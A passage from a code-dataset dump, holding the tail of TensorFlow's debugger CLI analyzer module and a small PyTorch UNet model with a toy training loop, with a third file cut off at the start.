[debugger_cli_common.MenuItem(\"\", command), \"bold\"]))\n row += \" \" * (\n max_op_type_width + max_dump_size_width + max_timestamp_width - len(row)\n )\n\n return debugger_cli_common.RichTextLines([row], font_attr_segs=attr_segs)\n\n def node_info(self, args, screen_info=None):\n \"\"\"Command handler for node_info.\n\n Query information about a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # TODO(cais): Add annotation of substrings for node names, to facilitate\n # on-screen highlighting/selection of node names.\n _ = screen_info\n\n parsed = self._arg_parsers[\"node_info\"].parse_args(args)\n\n # Get a node name, regardless of whether the input is a node name (without\n # output slot attached) or a tensor name (with output slot attached).\n node_name, unused_slot = debug_graphs.parse_node_or_tensor_name(\n parsed.node_name)\n\n if not self._debug_dump.node_exists(node_name):\n output = cli_shared.error(\n \"There is no node named \\\"%s\\\" in the partition graphs\" % node_name)\n _add_main_menu(\n output,\n node_name=None,\n enable_list_tensors=True,\n enable_node_info=False,\n enable_list_inputs=False,\n enable_list_outputs=False)\n return output\n\n # TODO(cais): Provide UI glossary feature to explain to users what the\n # term \"partition graph\" means and how it is related to TF graph objects\n # in Python. The information can be along the line of:\n # \"A tensorflow graph defined in Python is stripped of unused ops\n # according to the feeds and fetches and divided into a number of\n # partition graphs that may be distributed among multiple devices and\n # hosts. The partition graphs are what's actually executed by the C++\n # runtime during a run() call.\"\n\n lines = [\"Node %s\" % node_name]\n font_attr_segs = {\n 0: [(len(lines[-1]) - len(node_name), len(lines[-1]), \"bold\")]\n }\n lines.append(\"\")\n lines.append(\" Op: %s\" % self._debug_dump.node_op_type(node_name))\n lines.append(\" Device: %s\" % self._debug_dump.node_device(node_name))\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n # List node inputs (non-control and control).\n inputs = self._exclude_denylisted_ops(\n self._debug_dump.node_inputs(node_name))\n ctrl_inputs = self._exclude_denylisted_ops(\n self._debug_dump.node_inputs(node_name, is_control=True))\n output.extend(self._format_neighbors(\"input\", inputs, ctrl_inputs))\n\n # List node output recipients (non-control and control).\n recs = self._exclude_denylisted_ops(\n self._debug_dump.node_recipients(node_name))\n ctrl_recs = self._exclude_denylisted_ops(\n self._debug_dump.node_recipients(node_name, is_control=True))\n output.extend(self._format_neighbors(\"recipient\", recs, ctrl_recs))\n\n # Optional: List attributes of the node.\n if parsed.attributes:\n output.extend(self._list_node_attributes(node_name))\n\n # Optional: List dumps available from the node.\n if parsed.dumps:\n output.extend(self._list_node_dumps(node_name))\n\n if parsed.traceback:\n output.extend(self._render_node_traceback(node_name))\n\n _add_main_menu(output, node_name=node_name, enable_node_info=False)\n return output\n\n def _exclude_denylisted_ops(self, node_names):\n \"\"\"Exclude all nodes whose op types are in _GRAPH_STRUCT_OP_TYPE_DENYLIST.\n\n Args:\n node_names: An iterable of node or graph element names.\n\n Returns:\n A list of node names that are not denylisted.\n \"\"\"\n return [\n node_name for node_name in node_names\n if self._debug_dump.node_op_type(debug_graphs.get_node_name(node_name))\n not in self._GRAPH_STRUCT_OP_TYPE_DENYLIST\n ]\n\n def _render_node_traceback(self, node_name):\n \"\"\"Render traceback of a node's creation in Python, if available.\n\n Args:\n node_name: (str) name of the node.\n\n Returns:\n A RichTextLines object containing the stack trace of the node's\n construction.\n \"\"\"\n\n lines = [RL(\"\"), RL(\"\"), RL(\"Traceback of node construction:\", \"bold\")]\n\n try:\n node_stack = self._debug_dump.node_traceback(node_name)\n for depth, (file_path, line, function_name, text) in enumerate(\n node_stack):\n lines.append(\"%d: %s\" % (depth, file_path))\n\n attribute = debugger_cli_common.MenuItem(\n \"\", \"ps %s -b %d\" % (file_path, line)) if text else None\n line_number_line = RL(\" \")\n line_number_line += RL(\"Line: %d\" % line, attribute)\n lines.append(line_number_line)\n\n lines.append(\" Function: %s\" % function_name)\n lines.append(\" Text: \" + ((\"\\\"%s\\\"\" % text) if text else \"None\"))\n lines.append(\"\")\n except KeyError:\n lines.append(\"(Node unavailable in the loaded Python graph)\")\n except LookupError:\n lines.append(\"(Unavailable because no Python graph has been loaded)\")\n\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n def list_inputs(self, args, screen_info=None):\n \"\"\"Command handler for inputs.\n\n Show inputs to a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # Screen info not currently used by this handler. Include this line to\n # mute pylint.\n _ = screen_info\n # TODO(cais): Use screen info to format the output lines more prettily,\n # e.g., hanging indent of long node names.\n\n parsed = self._arg_parsers[\"list_inputs\"].parse_args(args)\n\n output = self._list_inputs_or_outputs(\n parsed.recursive,\n parsed.node_name,\n parsed.depth,\n parsed.control,\n parsed.op_type,\n do_outputs=False)\n\n node_name = debug_graphs.get_node_name(parsed.node_name)\n _add_main_menu(output, node_name=node_name, enable_list_inputs=False)\n\n return output\n\n def print_tensor(self, args, screen_info=None):\n \"\"\"Command handler for print_tensor.\n\n Print value of a given dumped tensor.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n parsed = self._arg_parsers[\"print_tensor\"].parse_args(args)\n\n np_printoptions = cli_shared.numpy_printoptions_from_screen_info(\n screen_info)\n\n # Determine if any range-highlighting is required.\n highlight_options = cli_shared.parse_ranges_highlight(parsed.ranges)\n\n tensor_name, tensor_slicing = (\n command_parser.parse_tensor_name_with_slicing(parsed.tensor_name))\n\n node_name, output_slot = debug_graphs.parse_node_or_tensor_name(tensor_name)\n if (self._debug_dump.loaded_partition_graphs() and\n not self._debug_dump.node_exists(node_name)):\n output = cli_shared.error(\n \"Node \\\"%s\\\" does not exist in partition graphs\" % node_name)\n _add_main_menu(\n output,\n node_name=None,\n enable_list_tensors=True,\n enable_print_tensor=False)\n return output\n\n watch_keys = self._debug_dump.debug_watch_keys(node_name)\n if output_slot is None:\n output_slots = set()\n for watch_key in watch_keys:\n output_slots.add(int(watch_key.split(\":\")[1]))\n\n if len(output_slots) == 1:\n # There is only one dumped tensor from this node, so there is no\n # ambiguity. Proceed to show the only dumped tensor.\n output_slot = list(output_slots)[0]\n else:\n # There are more than one dumped tensors from this node. Indicate as\n # such.\n # TODO(cais): Provide an output screen with command links for\n # convenience.\n lines = [\n \"Node \\\"%s\\\" generated debug dumps from %s output slots:\" %\n (node_name, len(output_slots)),\n \"Please specify the output slot: %s:x.\" % node_name\n ]\n output = debugger_cli_common.RichTextLines(lines)\n _add_main_menu(\n output,\n node_name=node_name,\n enable_list_tensors=True,\n enable_print_tensor=False)\n return output\n\n # Find debug dump data that match the tensor name (node name + output\n # slot).\n matching_data = []\n for watch_key in watch_keys:\n debug_tensor_data = self._debug_dump.watch_key_to_data(watch_key)\n for datum in debug_tensor_data:\n if datum.output_slot == output_slot:\n matching_data.append(datum)\n\n if not matching_data:\n # No dump for this tensor.\n output = cli_shared.error(\"Tensor \\\"%s\\\" did not generate any dumps.\" %\n parsed.tensor_name)\n elif len(matching_data) == 1:\n # There is only one dump for this tensor.\n if parsed.number <= 0:\n output = cli_shared.format_tensor(\n matching_data[0].get_tensor(),\n matching_data[0].watch_key,\n np_printoptions,\n print_all=parsed.print_all,\n tensor_slicing=tensor_slicing,\n highlight_options=highlight_options,\n include_numeric_summary=parsed.numeric_summary,\n write_path=parsed.write_path)\n else:\n output = cli_shared.error(\n \"Invalid number (%d) for tensor %s, which generated one dump.\" %\n (parsed.number, parsed.tensor_name))\n\n _add_main_menu(output, node_name=node_name, enable_print_tensor=False)\n else:\n # There are more than one dumps for this tensor.\n if parsed.number < 0:\n lines = [\n \"Tensor \\\"%s\\\" generated %d dumps:\" % (parsed.tensor_name,\n len(matching_data))\n ]\n font_attr_segs = {}\n\n for i, datum in enumerate(matching_data):\n rel_time = (datum.timestamp - self._debug_dump.t0) / 1000.0\n lines.append(\"#%d [%.3f ms] %s\" % (i, rel_time, datum.watch_key))\n command = \"print_tensor %s -n %d\" % (parsed.tensor_name, i)\n font_attr_segs[len(lines) - 1] = [(\n len(lines[-1]) - len(datum.watch_key), len(lines[-1]),\n debugger_cli_common.MenuItem(None, command))]\n\n lines.append(\"\")\n lines.append(\n \"You can use the -n (--number) flag to specify which dump to \"\n \"print.\")\n lines.append(\"For example:\")\n lines.append(\" print_tensor %s -n 0\" % parsed.tensor_name)\n\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n elif parsed.number >= len(matching_data):\n output = cli_shared.error(\n \"Specified number (%d) exceeds the number of available dumps \"\n \"(%d) for tensor %s\" %\n (parsed.number, len(matching_data), parsed.tensor_name))\n else:\n output = cli_shared.format_tensor(\n matching_data[parsed.number].get_tensor(),\n matching_data[parsed.number].watch_key + \" (dump #%d)\" %\n parsed.number,\n np_printoptions,\n print_all=parsed.print_all,\n tensor_slicing=tensor_slicing,\n highlight_options=highlight_options,\n write_path=parsed.write_path)\n _add_main_menu(output, node_name=node_name, enable_print_tensor=False)\n\n return output\n\n def list_outputs(self, args, screen_info=None):\n \"\"\"Command handler for inputs.\n\n Show inputs to a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # Screen info not currently used by this handler. Include this line to\n # mute pylint.\n _ = screen_info\n # TODO(cais): Use screen info to format the output lines more prettily,\n # e.g., hanging indent of long node names.\n\n parsed = self._arg_parsers[\"list_outputs\"].parse_args(args)\n\n output = self._list_inputs_or_outputs(\n parsed.recursive,\n parsed.node_name,\n parsed.depth,\n parsed.control,\n parsed.op_type,\n do_outputs=True)\n\n node_name = debug_graphs.get_node_name(parsed.node_name)\n _add_main_menu(output, node_name=node_name, enable_list_outputs=False)\n\n return output\n\n def evaluate_expression(self, args, screen_info=None):\n parsed = self._arg_parsers[\"eval\"].parse_args(args)\n\n eval_res = self._evaluator.evaluate(parsed.expression)\n\n np_printoptions = cli_shared.numpy_printoptions_from_screen_info(\n screen_info)\n return cli_shared.format_tensor(\n eval_res,\n \"from eval of expression '%s'\" % parsed.expression,\n np_printoptions,\n print_all=parsed.print_all,\n include_numeric_summary=True,\n write_path=parsed.write_path)\n\n def _reconstruct_print_source_command(self,\n parsed,\n line_begin,\n max_elements_per_line_increase=0):\n return \"ps %s %s -b %d -m %d\" % (\n parsed.source_file_path, \"-t\" if parsed.tensors else \"\", line_begin,\n parsed.max_elements_per_line + max_elements_per_line_increase)\n\n def print_source(self, args, screen_info=None):\n \"\"\"Print the content of a source file.\"\"\"\n del screen_info # Unused.\n\n parsed = self._arg_parsers[\"print_source\"].parse_args(args)\n\n source_annotation = source_utils.annotate_source(\n self._debug_dump,\n parsed.source_file_path,\n do_dumped_tensors=parsed.tensors)\n\n source_lines, line_num_width = source_utils.load_source(\n parsed.source_file_path)\n\n labeled_source_lines = []\n actual_initial_scroll_target = 0\n for i, line in enumerate(source_lines):\n annotated_line = RL(\"L%d\" % (i + 1), cli_shared.COLOR_YELLOW)\n annotated_line += \" \" * (line_num_width - len(annotated_line))\n annotated_line += line\n labeled_source_lines.append(annotated_line)\n\n if i + 1 == parsed.line_begin:\n actual_initial_scroll_target = len(labeled_source_lines) - 1\n\n if i + 1 in source_annotation:\n sorted_elements = sorted(source_annotation[i + 1])\n for k, element in enumerate(sorted_elements):\n if k >= parsed.max_elements_per_line:\n omitted_info_line = RL(\" (... Omitted %d of %d %s ...) \" % (\n len(sorted_elements) - parsed.max_elements_per_line,\n len(sorted_elements),\n \"tensor(s)\" if parsed.tensors else \"op(s)\"))\n omitted_info_line += RL(\n \"+5\",\n debugger_cli_common.MenuItem(\n None,\n self._reconstruct_print_source_command(\n parsed, i + 1, max_elements_per_line_increase=5)))\n labeled_source_lines.append(omitted_info_line)\n break\n\n label = RL(\" \" * 4)\n if self._debug_dump.debug_watch_keys(\n debug_graphs.get_node_name(element)):\n attribute = debugger_cli_common.MenuItem(\"\", \"pt %s\" % element)\n else:\n attribute = cli_shared.COLOR_BLUE\n\n label += RL(element, attribute)\n labeled_source_lines.append(label)\n\n output = debugger_cli_common.rich_text_lines_from_rich_line_list(\n labeled_source_lines,\n annotations={debugger_cli_common.INIT_SCROLL_POS_KEY:\n actual_initial_scroll_target})\n _add_main_menu(output, node_name=None)\n return output\n\n def _make_source_table(self, source_list, is_tf_py_library):\n \"\"\"Make a table summarizing the source files that create nodes and tensors.\n\n Args:\n source_list: List of source files and related information as a list of\n tuples (file_path, is_tf_library, num_nodes, num_tensors, num_dumps,\n first_line).\n is_tf_py_library: (`bool`) whether this table is for files that belong\n to the TensorFlow Python library.\n\n Returns:\n The table as a `debugger_cli_common.RichTextLines` object.\n \"\"\"\n path_head = \"Source file path\"\n num_nodes_head = \"#(nodes)\"\n num_tensors_head = \"#(tensors)\"\n num_dumps_head = \"#(tensor dumps)\"\n\n if is_tf_py_library:\n # Use color to mark files that are guessed to belong to TensorFlow Python\n # library.\n color = cli_shared.COLOR_GRAY\n lines = [RL(\"TensorFlow Python library file(s):\", color)]\n else:\n color = cli_shared.COLOR_WHITE\n lines = [RL(\"File(s) outside TensorFlow Python library:\", color)]\n\n if not source_list:\n lines.append(RL(\"[No files.]\"))\n lines.append(RL())\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n path_column_width = max(\n max(len(item[0]) for item in source_list), len(path_head)) + 1\n num_nodes_column_width = max(\n max(len(str(item[2])) for item in source_list),\n len(num_nodes_head)) + 1\n num_tensors_column_width = max(\n max(len(str(item[3])) for item in source_list),\n len(num_tensors_head)) + 1\n\n head = RL(path_head + \" \" * (path_column_width - len(path_head)), color)\n head += RL(num_nodes_head + \" \" * (\n num_nodes_column_width - len(num_nodes_head)), color)\n head += RL(num_tensors_head + \" \" * (\n num_tensors_column_width - len(num_tensors_head)), color)\n head += RL(num_dumps_head, color)\n\n lines.append(head)\n\n for (file_path, _, num_nodes, num_tensors, num_dumps,\n first_line_num) in source_list:\n path_attributes = [color]\n if source_utils.is_extension_uncompiled_python_source(file_path):\n path_attributes.append(\n debugger_cli_common.MenuItem(None, \"ps %s -b %d\" %\n (file_path, first_line_num)))\n\n line = RL(file_path, path_attributes)\n line += \" \" * (path_column_width - len(line))\n line += RL(\n str(num_nodes) + \" \" * (num_nodes_column_width - len(str(num_nodes))),\n color)\n line += RL(\n str(num_tensors) + \" \" *\n (num_tensors_column_width - len(str(num_tensors))), color)\n line += RL(str(num_dumps), color)\n lines.append(line)\n lines.append(RL())\n\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n def list_source(self, args, screen_info=None):\n \"\"\"List Python source files that constructed nodes and tensors.\"\"\"\n del screen_info # Unused.\n\n parsed = self._arg_parsers[\"list_source\"].parse_args(args)\n source_list = source_utils.list_source_files_against_dump(\n self._debug_dump,\n path_regex_allowlist=parsed.path_filter,\n node_name_regex_allowlist=parsed.node_name_filter)\n\n top_lines = [\n RL(\"List of source files that created nodes in this run\", \"bold\")]\n if parsed.path_filter:\n top_lines.append(\n RL(\"File path regex filter: \\\"%s\\\"\" % parsed.path_filter))\n if parsed.node_name_filter:\n top_lines.append(\n RL(\"Node name regex filter: \\\"%s\\\"\" % parsed.node_name_filter))\n top_lines.append(RL())\n output = debugger_cli_common.rich_text_lines_from_rich_line_list(top_lines)\n if not source_list:\n output.append(\"[No source file information.]\")\n return output\n\n output.extend(self._make_source_table(\n [item for item in source_list if not item[1]], False))\n output.extend(self._make_source_table(\n [item for item in source_list if item[1]], True))\n _add_main_menu(output, node_name=None)\n return output\n\n def _list_inputs_or_outputs(self,\n recursive,\n node_name,\n depth,\n control,\n op_type,\n do_outputs=False):\n \"\"\"Helper function used by list_inputs and list_outputs.\n\n Format a list of lines to display the inputs or output recipients of a\n given node.\n\n Args:\n recursive: Whether the listing is to be done recursively, as a boolean.\n node_name: The name of the node in question, as a str.\n depth: Maximum recursion depth, applies only if recursive == True, as an\n int.\n control: Whether control inputs or control recipients are included, as a\n boolean.\n op_type: Whether the op types of the nodes are to be included, as a\n boolean.\n do_outputs: Whether recipients, instead of input nodes are to be\n listed, as a boolean.\n\n Returns:\n Input or recipient tree formatted as a RichTextLines object.\n \"\"\"\n\n if do_outputs:\n tracker = self._debug_dump.node_recipients\n type_str = \"Recipients of\"\n short_type_str = \"recipients\"\n else:\n tracker = self._debug_dump.node_inputs\n type_str = \"Inputs to\"\n short_type_str = \"inputs\"\n\n lines = []\n font_attr_segs = {}\n\n # Check if this is a tensor name, instead of a node name.\n node_name, _ = debug_graphs.parse_node_or_tensor_name(node_name)\n\n # Check if node exists.\n if not self._debug_dump.node_exists(node_name):\n return cli_shared.error(\n \"There is no node named \\\"%s\\\" in the partition graphs\" % node_name)\n\n if recursive:\n max_depth = depth\n else:\n max_depth = 1\n\n if control:\n include_ctrls_str = \", control %s included\" % short_type_str\n else:\n include_ctrls_str = \"\"\n\n line = \"%s node \\\"%s\\\"\" % (type_str, node_name)\n font_attr_segs[0] = [(len(line) - 1 - len(node_name), len(line) - 1, \"bold\")\n ]\n lines.append(line + \" (Depth limit = %d%s):\" % (max_depth, include_ctrls_str\n ))\n\n command_template = \"lo -c -r %s\" if do_outputs else \"li -c -r %s\"\n self._dfs_from_node(\n lines,\n font_attr_segs,\n node_name,\n tracker,\n max_depth,\n 1, [],\n control,\n op_type,\n command_template=command_template)\n\n # Include legend.\n lines.append(\"\")\n lines.append(\"Legend:\")\n lines.append(\" (d): recursion depth = d.\")\n\n if control:\n lines.append(\" (Ctrl): Control input.\")\n if op_type:\n lines.append(\" [Op]: Input node has op type Op.\")\n\n # TODO(cais): Consider appending \":0\" at the end of 1st outputs of nodes.\n\n return debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n def _dfs_from_node(self,\n lines,\n attr_segs,\n node_name,\n tracker,\n max_depth,\n depth,\n unfinished,\n include_control=False,\n show_op_type=False,\n command_template=None):\n \"\"\"Perform depth-first search (DFS) traversal of a node's input tree.\n\n It recursively tracks the inputs (or output recipients) of the node called\n node_name, and append these inputs (or output recipients) to a list of text\n lines (lines) with proper indentation that reflects the recursion depth,\n together with some formatting attributes (to attr_segs). The formatting\n attributes can include command shortcuts, for example.\n\n Args:\n lines: Text lines to append to, as a list of str.\n attr_segs: (dict) Attribute segments dictionary to append to.\n node_name: Name of the node, as a str. This arg is updated during the\n recursion.\n tracker: A callable that takes one str as the node name input and\n returns a list of str as the inputs/outputs.\n This makes it this function general enough to be used with both\n node-input and node-output tracking.\n max_depth: Maximum recursion depth, as an int.\n depth: Current recursion depth. This arg is updated during the\n recursion.\n unfinished: A stack of unfinished recursion depths, as a list of int.\n include_control: Whether control dependencies are to be included as\n inputs (and marked as such).\n show_op_type: Whether op type of the input nodes are to be displayed\n alongside the nodes' names.\n command_template: (str) Template for command shortcut of the node names.\n \"\"\"\n\n # Make a shallow copy of the list because it may be extended later.\n all_inputs = self._exclude_denylisted_ops(\n copy.copy(tracker(node_name, is_control=False)))\n is_ctrl = [False] * len(all_inputs)\n if include_control:\n # Sort control inputs or recipients in alphabetical order of the node\n # names.\n ctrl_inputs = self._exclude_denylisted_ops(\n sorted(tracker(node_name, is_control=True)))\n all_inputs.extend(ctrl_inputs)\n is_ctrl.extend([True] * len(ctrl_inputs))\n\n if not all_inputs:\n if depth == 1:\n lines.append(\" [None]\")\n\n return\n\n unfinished.append(depth)\n\n # Create depth-dependent hanging indent for the line.\n hang = \"\"\n for k in range(depth):\n if k < depth - 1:\n if k + 1 in unfinished:\n hang += HANG_UNFINISHED\n else:\n hang += HANG_FINISHED\n else:\n hang += HANG_SUFFIX\n\n if all_inputs and depth > max_depth:\n lines.append(hang + ELLIPSIS)\n unfinished.pop()\n return\n\n hang += DEPTH_TEMPLATE % depth\n\n for i, inp in enumerate(all_inputs):\n op_type = self._debug_dump.node_op_type(debug_graphs.get_node_name(inp))\n if op_type in self._GRAPH_STRUCT_OP_TYPE_DENYLIST:\n continue\n\n if is_ctrl[i]:\n ctrl_str = CTRL_LABEL\n else:\n ctrl_str = \"\"\n\n op_type_str = \"\"\n if show_op_type:\n op_type_str = OP_TYPE_TEMPLATE % op_type\n\n if i == len(all_inputs) - 1:\n unfinished.pop()\n\n line = hang + ctrl_str + op_type_str + inp\n lines.append(line)\n if command_template:\n attr_segs[len(lines) - 1] = [(\n len(line) - len(inp), len(line),\n debugger_cli_common.MenuItem(None, command_template % inp))]\n\n # Recursive call.\n # The input's/output's name can be a tensor name, in the case of node\n # with >1 output slots.\n inp_node_name, _ = debug_graphs.parse_node_or_tensor_name(inp)\n self._dfs_from_node(\n lines,\n attr_segs,\n inp_node_name,\n tracker,\n max_depth,\n depth + 1,\n unfinished,\n include_control=include_control,\n show_op_type=show_op_type,\n command_template=command_template)\n\n def _format_neighbors(self, neighbor_type, non_ctrls, ctrls):\n \"\"\"List neighbors (inputs or recipients) of a node.\n\n Args:\n neighbor_type: (\"input\" | \"recipient\")\n non_ctrls: Non-control neighbor node names, as a list of str.\n ctrls: Control neighbor node names, as a list of str.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n # TODO(cais): Return RichTextLines instead, to allow annotation of node\n # names.\n lines = []\n font_attr_segs = {}\n\n lines.append(\"\")\n lines.append(\" %d %s(s) + %d control %s(s):\" %\n (len(non_ctrls), neighbor_type, len(ctrls), neighbor_type))\n lines.append(\" %d %s(s):\" % (len(non_ctrls), neighbor_type))\n for non_ctrl in non_ctrls:\n line = \" [%s] %s\" % (self._debug_dump.node_op_type(non_ctrl),\n non_ctrl)\n lines.append(line)\n font_attr_segs[len(lines) - 1] = [(\n len(line) - len(non_ctrl), len(line),\n debugger_cli_common.MenuItem(None, \"ni -a -d -t %s\" % non_ctrl))]\n\n if ctrls:\n lines.append(\"\")\n lines.append(\" %d control %s(s):\" % (len(ctrls), neighbor_type))\n for ctrl in ctrls:\n line = \" [%s] %s\" % (self._debug_dump.node_op_type(ctrl), ctrl)\n lines.append(line)\n font_attr_segs[len(lines) - 1] = [(\n len(line) - len(ctrl), len(line),\n debugger_cli_common.MenuItem(None, \"ni -a -d -t %s\" % ctrl))]\n\n return debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n def _list_node_attributes(self, node_name):\n \"\"\"List neighbors (inputs or recipients) of a node.\n\n Args:\n node_name: Name of the node of which the attributes are to be listed.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n lines = []\n lines.append(\"\")\n lines.append(\"Node attributes:\")\n\n attrs = self._debug_dump.node_attributes(node_name)\n for attr_key in attrs:\n lines.append(\" %s:\" % attr_key)\n attr_val_str = repr(attrs[attr_key]).strip().replace(\"\\n\", \" \")\n lines.append(\" %s\" % attr_val_str)\n lines.append(\"\")\n\n return debugger_cli_common.RichTextLines(lines)\n\n def _list_node_dumps(self, node_name):\n \"\"\"List dumped tensor data from a node.\n\n Args:\n node_name: Name of the node of which the attributes are to be listed.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n lines = []\n font_attr_segs = {}\n\n watch_keys = self._debug_dump.debug_watch_keys(node_name)\n\n dump_count = 0\n for watch_key in watch_keys:\n debug_tensor_data = self._debug_dump.watch_key_to_data(watch_key)\n for datum in debug_tensor_data:\n line = \" Slot %d @ %s @ %.3f ms\" % (\n datum.output_slot, datum.debug_op,\n (datum.timestamp - self._debug_dump.t0) / 1000.0)\n lines.append(line)\n command = \"pt %s:%d -n %d\" % (node_name, datum.output_slot, dump_count)\n font_attr_segs[len(lines) - 1] = [(\n 2, len(line), debugger_cli_common.MenuItem(None, command))]\n dump_count += 1\n\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n output_with_header = debugger_cli_common.RichTextLines(\n [\"%d dumped tensor(s):\" % dump_count, \"\"])\n output_with_header.extend(output)\n return output_with_header\n\n\ndef create_analyzer_ui(debug_dump,\n tensor_filters=None,\n ui_type=\"readline\",\n on_ui_exit=None,\n config=None):\n \"\"\"Create an instance of ReadlineUI based on a DebugDumpDir object.\n\n Args:\n debug_dump: (debug_data.DebugDumpDir) The debug dump to use.\n tensor_filters: (dict) A dict mapping tensor filter name (str) to tensor\n filter (Callable).\n ui_type: (str) requested UI type, only \"readline\" is supported.\n on_ui_exit: (`Callable`) the callback to be called when the UI exits.\n config: A `cli_config.CLIConfig` object.\n\n Returns:\n (base_ui.BaseUI) A BaseUI subtype object with a set of standard analyzer\n commands and tab-completions registered.\n \"\"\"\n if config is None:\n config = cli_config.CLIConfig()\n\n analyzer = DebugAnalyzer(debug_dump, config=config)\n if tensor_filters:\n for tensor_filter_name in tensor_filters:\n analyzer.add_tensor_filter(\n tensor_filter_name, tensor_filters[tensor_filter_name])\n\n cli = ui_factory.get_ui(ui_type, on_ui_exit=on_ui_exit, config=config)\n cli.register_command_handler(\n \"list_tensors\",\n analyzer.list_tensors,\n analyzer.get_help(\"list_tensors\"),\n prefix_aliases=[\"lt\"])\n cli.register_command_handler(\n \"node_info\",\n analyzer.node_info,\n analyzer.get_help(\"node_info\"),\n prefix_aliases=[\"ni\"])\n cli.register_command_handler(\n \"list_inputs\",\n analyzer.list_inputs,\n analyzer.get_help(\"list_inputs\"),\n prefix_aliases=[\"li\"])\n cli.register_command_handler(\n \"list_outputs\",\n analyzer.list_outputs,\n analyzer.get_help(\"list_outputs\"),\n prefix_aliases=[\"lo\"])\n cli.register_command_handler(\n \"print_tensor\",\n analyzer.print_tensor,\n analyzer.get_help(\"print_tensor\"),\n prefix_aliases=[\"pt\"])\n cli.register_command_handler(\n \"print_source\",\n analyzer.print_source,\n analyzer.get_help(\"print_source\"),\n prefix_aliases=[\"ps\"])\n cli.register_command_handler(\n \"list_source\",\n analyzer.list_source,\n analyzer.get_help(\"list_source\"),\n prefix_aliases=[\"ls\"])\n cli.register_command_handler(\n \"eval\",\n analyzer.evaluate_expression,\n analyzer.get_help(\"eval\"),\n prefix_aliases=[\"ev\"])\n\n dumped_tensor_names = []\n for datum in debug_dump.dumped_tensor_data:\n dumped_tensor_names.append(\"%s:%d\" % (datum.node_name, datum.output_slot))\n\n # Tab completions for command \"print_tensors\".\n cli.register_tab_comp_context([\"print_tensor\", \"pt\"], dumped_tensor_names)\n\n return cli\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/debug/cli/analyzer_cli.py","file_name":"analyzer_cli.py","file_ext":"py","file_size_in_byte":57643,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"28467815832","text":"# -*- coding: utf-8 -*-\n'''\nDescription: structure of Unet\n'''\nfrom model_parts import *\nimport torch\nfrom torch import optim\n\n\nclass UNet(nn.Module):\n def __init__(self, n_channels, n_classes):\n super(UNet, self).__init__()\n\n #进行下采样\n self.inc = inconv(n_channels, 16) \n self.down1 = down(16, 32) \n self.down2 = down(32, 64) \n self.down3 = down(64, 128) \n self.down4 = down(128, 128) \n\n #进行上采样\n self.up1 = up(256, 64, 128) \n self.up2 = up(128, 32, 64) \n self.up3 = up(64, 16, 32) \n self.up4 = up(32, 16, 16) \n self.outc = outconv(16, n_classes)\n\n ##网络前向传播\n def forward(self, x_raw):\n\n x1 = self.inc(x_raw)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n x = self.outc(x)\n\n return x\n\n ###网络参数初始化,此处使用凯明分布\n def weight_init(self):\n for m in self._modules:\n weights_init_kaiming(m)\n\n\ndef weights_init_kaiming(m):\n class_name = m.__class__.__name__\n if class_name.find('Linear') != -1:\n torch.nn.init.kaiming_normal_(m.weight) # 利用凯明均匀分布来进行初始化\n if m.bias is not None:\n m.bias.data.zero_()\n elif class_name.find('Conv2d') != -1:\n torch.nn.init.kaiming_normal_(m.weight)\n if m.bias is not None:\n m.bias.data.zero_()\n elif class_name.find('ConvTranspose2d') != -1:\n torch.nn.init.kaiming_normal_(m.weight)\n if m.bias is not None:\n m.bias.data.zero_()\n elif class_name.find('Norm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n if m.bias is not None:\n m.bias.data.zero_()\n\nif __name__ == '__main__':\n\n UNet_model = UNet(3, 1) # 输入数据的channel为3,输出数据的channel为1\n optimizer = optim.Adam(UNet_model.parameters(), lr=0.001, weight_decay=0.0001)\n loss_func = nn.MSELoss(reduction='sum')\n train_loss = 0\n\n #进行100次模拟训练\n for i in range(100):\n ##模拟训练数据\n img = torch.rand(2, 3, 600, 600)\n ##模拟真实值\n label = torch.rand(2, 1, 600, 600)\n #模型前向传播计算\n img_pred = UNet_model(img)\n loss = loss_func(label, img_pred)\n\n ##优化器反向传播操作\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()##更新权重\n train_loss += loss\n\n #每训练10次便记录一次误差值\n if i % 10 == 0:\n print(\"iter:{},loss:{}\".format(i, train_loss / 10))\n train_loss = 0\n\n\n","repo_name":"TianyiXiong1998/Projects-Repository","sub_path":"CU-net/Unet.py","file_name":"Unet.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8483141404","text":"import cv2\nimport sys, os,getopt \nfrom mpi4py import MPI\nfrom EMAN2 import *\nimport numpy as np\ndef readStar(fin):\n f=open(fin,'r');\n l=f.readlines();\n count=0;\n for r in 